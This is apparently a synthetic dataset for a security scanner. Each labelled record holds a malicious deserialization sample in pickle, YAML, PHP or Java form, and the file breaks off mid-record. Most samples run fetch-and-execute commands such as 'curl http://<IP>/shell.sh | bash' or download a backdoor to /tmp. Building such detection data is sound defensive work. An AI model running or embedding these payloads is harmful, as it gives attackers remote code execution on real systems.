{"id": "synth_malicious_deserialization_00000", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('Gbd94YRuItThE8qCYT6HjYFFOiR/3eMLXS7Xs313FBz69X4Oc/DswrDLpBEZ')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://148.140.72.216/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('Gbd94YRuItThE8qCYT6HjYFFOiR/3eMLXS7Xs313FBz69X4Oc/DswrDLpBEZ')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00001", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('URucXULW2r57olNe1DB11HypSpS5cMAH/1m4ZgUFj/ltWxNT/I5YzOn7xCVi')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://101.58.50.96/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('URucXULW2r57olNe1DB11HypSpS5cMAH/1m4ZgUFj/ltWxNT/I5YzOn7xCVi')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00002", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://30.65.66.36/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://68.129.253.84/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://30.65.66.36/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://68.129.253.84/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00003", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:60:\"fDETmnExKOByT5QNWht9FI7Ch4m8qVYITsLZy//h\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://240.121.113.66/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:60:\"fDETmnExKOByT5QNWht9FI7Ch4m8qVYITsLZy//h\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://240.121.113.66/bd\")"}}]} {"id": "synth_malicious_deserialization_00004", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('ARqu1IjbTnqz4bpmfX42/OSPflnzzd5ImQIFR+Zxe6mEDJbqOkC8Ix2wXOnG')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://68.15.92.214/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('ARqu1IjbTnqz4bpmfX42/OSPflnzzd5ImQIFR+Zxe6mEDJbqOkC8Ix2wXOnG')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00005", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://139.93.139.121/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://139.93.139.121/shell\")"}}]} {"id": "synth_malicious_deserialization_00006", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://148.85.251.189/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://148.85.251.189/shell\")"}}]} {"id": "synth_malicious_deserialization_00007", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:22:\"ED3TyAH3Qoir/d10K9b1mDG7wxvCqkYxTuq8VKeD\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://220.194.102.194/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:22:\"ED3TyAH3Qoir/d10K9b1mDG7wxvCqkYxTuq8VKeD\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://220.194.102.194/bd\")"}}]} {"id": "synth_malicious_deserialization_00008", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections5\n// Payload: Runtime.exec(\"curl http://39.76.212.188/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections5\n// Payload: Runtime.exec(\"curl http://39.76.212.188/shell\")"}}]} {"id": "synth_malicious_deserialization_00009", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://30.115.185.205/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://164.211.45.214/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://30.115.185.205/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://164.211.45.214/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00010", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://118.139.168.128/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://118.139.168.128/shell\")"}}]} {"id": "synth_malicious_deserialization_00011", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:26:\"BJbfALAxhhnKVbY+HMoqabXK9GcBNeSCvOExubld\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://132.192.10.209/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:26:\"BJbfALAxhhnKVbY+HMoqabXK9GcBNeSCvOExubld\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://132.192.10.209/bd\")"}}]} {"id": "synth_malicious_deserialization_00012", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://219.190.239.224/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://101.8.175.18/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://219.190.239.224/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://101.8.175.18/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00013", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('2HOIs65WP/agn89bnX/th1uGA9LvDCVTp+y0Tvuth1GeaRsVBRpK207VpE2b')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://216.124.250.162/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('2HOIs65WP/agn89bnX/th1uGA9LvDCVTp+y0Tvuth1GeaRsVBRpK207VpE2b')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00014", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://119.7.8.21/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://25.149.147.145/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://119.7.8.21/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://25.149.147.145/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00015", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:33:\"wSB+zPk184SzWYTQxIoYBKtCueC/XsPpuX/nxM0B\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://54.175.97.102/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:33:\"wSB+zPk184SzWYTQxIoYBKtCueC/XsPpuX/nxM0B\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://54.175.97.102/bd\")"}}]} {"id": "synth_malicious_deserialization_00016", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://172.232.168.3/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://172.232.168.3/shell\")"}}]} {"id": "synth_malicious_deserialization_00017", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('zNiF99Ant0tMdxQEh6e2LwZKaJw+3wORvhlhfC+JKJcKs8oes8aEKPYjHqz1')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://23.48.121.2/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('zNiF99Ant0tMdxQEh6e2LwZKaJw+3wORvhlhfC+JKJcKs8oes8aEKPYjHqz1')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00018", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://7.172.99.155/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://43.17.62.249/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://7.172.99.155/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://43.17.62.249/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00019", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://115.43.83.249/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://200.212.35.175/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://115.43.83.249/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://200.212.35.175/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00020", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://136.164.55.138/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://136.164.55.138/shell\")"}}]} {"id": "synth_malicious_deserialization_00021", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://62.71.74.103/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://62.71.74.103/shell\")"}}]} {"id": "synth_malicious_deserialization_00022", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://246.138.101.196/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://231.238.158.164/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://246.138.101.196/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://231.238.158.164/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00023", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('CFgSQcxHQZoR+T5tvxaZSCMnc7mvdaAx/aUVazX0b0E3ky/daxaVA3L0+HGk')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://86.126.169.177/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('CFgSQcxHQZoR+T5tvxaZSCMnc7mvdaAx/aUVazX0b0E3ky/daxaVA3L0+HGk')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00024", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('SGwGreCFxfI27tI9DfAEQHo6seeiutZgFAGFl0BufBUAQG2OpX0Z72zNbFjs')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://88.90.219.64/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('SGwGreCFxfI27tI9DfAEQHo6seeiutZgFAGFl0BufBUAQG2OpX0Z72zNbFjs')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00025", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('Frjtro4mjARSzPDopz+8x1crAXYocN7+uCoeAXqkoonZShIst7kVwozymiTA')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://38.87.190.185/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('Frjtro4mjARSzPDopz+8x1crAXYocN7+uCoeAXqkoonZShIst7kVwozymiTA')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00026", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://64.240.115.183/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://48.125.244.42/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://64.240.115.183/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://48.125.244.42/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00027", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:44:\"HyMeAYhNsZjli5aEPwpsiBlvE4gAT5hDdff3tIpe\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://77.253.131.214/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:44:\"HyMeAYhNsZjli5aEPwpsiBlvE4gAT5hDdff3tIpe\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://77.253.131.214/bd\")"}}]} {"id": "synth_malicious_deserialization_00028", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://249.181.71.42/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://249.181.71.42/shell\")"}}]} {"id": "synth_malicious_deserialization_00029", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('qvaGfALbBYYGhjXP80MOob0toKFDsu24r8iP8y2XS7d4uFKcpCRTWCLTNbS/')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://59.244.22.142/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('qvaGfALbBYYGhjXP80MOob0toKFDsu24r8iP8y2XS7d4uFKcpCRTWCLTNbS/')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00030", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:45:\"9FyhR4Qiq9fCG3pbpNuL6MMyJLK9Wdo5yrahN5v2\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://217.44.57.159/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:45:\"9FyhR4Qiq9fCG3pbpNuL6MMyJLK9Wdo5yrahN5v2\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://217.44.57.159/bd\")"}}]} {"id": "synth_malicious_deserialization_00031", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:44:\"/mu558y+QUn1C4W0DTIj6dR40bGWmG1wele3cqWv\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://207.73.218.81/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:44:\"/mu558y+QUn1C4W0DTIj6dR40bGWmG1wele3cqWv\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://207.73.218.81/bd\")"}}]} {"id": "synth_malicious_deserialization_00032", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://32.16.16.14/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://153.246.105.228/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://32.16.16.14/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://153.246.105.228/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00033", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('mA9+LvMpJvHVhwuWDj5RXIKwp+IUzt625NlyO4rkYVEsVmeRfSIksVlv7xcd')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://166.2.126.250/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('mA9+LvMpJvHVhwuWDj5RXIKwp+IUzt625NlyO4rkYVEsVmeRfSIksVlv7xcd')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00034", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://249.90.146.137/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://83.252.58.94/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://249.90.146.137/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://83.252.58.94/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00035", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://13.62.80.169/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://13.62.80.169/shell\")"}}]} {"id": "synth_malicious_deserialization_00036", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://96.120.29.244/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://96.120.29.244/shell\")"}}]} {"id": "synth_malicious_deserialization_00037", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://125.197.201.138/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://125.197.201.138/shell\")"}}]} {"id": "synth_malicious_deserialization_00038", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://227.171.139.238/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://163.1.152.225/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://227.171.139.238/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://163.1.152.225/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00039", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('vThLGhwb/NCqvUCXOznxtgSVjvdtdF90P4cdmeSnHcUjUVKD31bfzohn4ak7')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://25.20.69.221/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('vThLGhwb/NCqvUCXOznxtgSVjvdtdF90P4cdmeSnHcUjUVKD31bfzohn4ak7')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00040", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('dd23MQSkUPwp3D5tVaoZUhdd0Zd9oRnnPv9wUmaxmGY/YyAcCcpOlHgrOT0p')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://153.58.239.142/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('dd23MQSkUPwp3D5tVaoZUhdd0Zd9oRnnPv9wUmaxmGY/YyAcCcpOlHgrOT0p')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00041", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:55:\"0dJiUiraNNjiooR4etydf+2F34ZYQv+Jh9KnW5jk\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://14.212.246.160/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:55:\"0dJiUiraNNjiooR4etydf+2F34ZYQv+Jh9KnW5jk\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://14.212.246.160/bd\")"}}]} {"id": "synth_malicious_deserialization_00042", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://131.25.226.12/payload | 